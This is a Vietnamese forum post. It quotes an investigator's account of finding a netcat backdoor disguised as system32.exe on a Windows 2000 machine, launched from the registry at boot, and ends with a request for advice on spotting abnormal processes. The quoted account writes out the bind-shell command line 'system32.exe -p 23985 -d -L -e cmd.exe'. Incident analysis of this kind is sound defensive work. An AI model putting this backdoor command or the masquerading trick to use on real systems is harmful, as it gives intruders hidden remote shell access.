Tiếp tục kiểm tra các xử lý (process) đang chạy trên hệ thống, tôi tìm ra một process có cái tên hay tuyệt: system32.exe. Process này nằm ngay cạnh system32.dll (một tập tin thư viện động của hệ thống). Phải công nhận rằng tay hacker này cũng rất thông minh khi đặt tên của backdoor (3) trùng tên với một tập tin hệ thống. Nó dễ dàng đánh lừa những người thiếu kinh nghiệm và cả những người có kinh nghiệm nhưng thiếu cẩn thận. Bằng lệnh dir cùng khóa chuyển /s tôi nhanh chóng xác định được vị trí của tập tin system32.exe. Nó được đặt tại 2 thư mục là WIN2K/SYSTEM32 và WIN2K/SYSTEM32/DLLCACHE.

Uhm, system32.exe này là cái gì vậy nhỉ? Tôi quyết định chạy thử xem nó là cái gì. Sau một hồi loay hoay với đủ các khóa chuyển, tôi xác định được nó chính là netcat. Một công cụ quen thuộc của các quản trị viên và cũng là một backdoor lợi hại của những kẻ xâm nhập. Nó như một chiếc đũa thần cho những kẻ xâm nhập với hàng loạt những chức năng như kết nối tới một máy chủ, quét cổng, truyền tải tập tin, và hoạt động như một backdoor.

Kiểm tra thư mục Start Up của hệ thống – hoàn toàn bình thường, không hề có một file nào gọi tới system32.exe. Kiểm tra hệ thống System Registry, tôi chợt mừng húm vì cảm giác mình khám phá ra thêm một manh mối, system32.exe đã được gọi khi máy khởi động với khóa chuyển như sau: system32.exe -p 23985 -d -L -e cmd.exe.

Wow, kiểm tra tiếp thử xem sao! Tôi sử dụng telnet vào localhost với port 23985 và kết quả nhận được là một shell lệnh của hệ thống Windows với dấu nhắc C:\> quen thuộc.  

Trích từ một bài viết xâm nhập thế giới hacker. ! Đọc xong đoạn đó mình tự nghĩ giá như có một ai đó có thể share kinh nghiệm nhận biết được thế nào là một process không bình thường và các cách tìm tiêu diệt nó cho các thành viên có thể phần nào tự bảo vệ được mình thì quá tốt !
Cảm ơn đọc ý kiến của mình!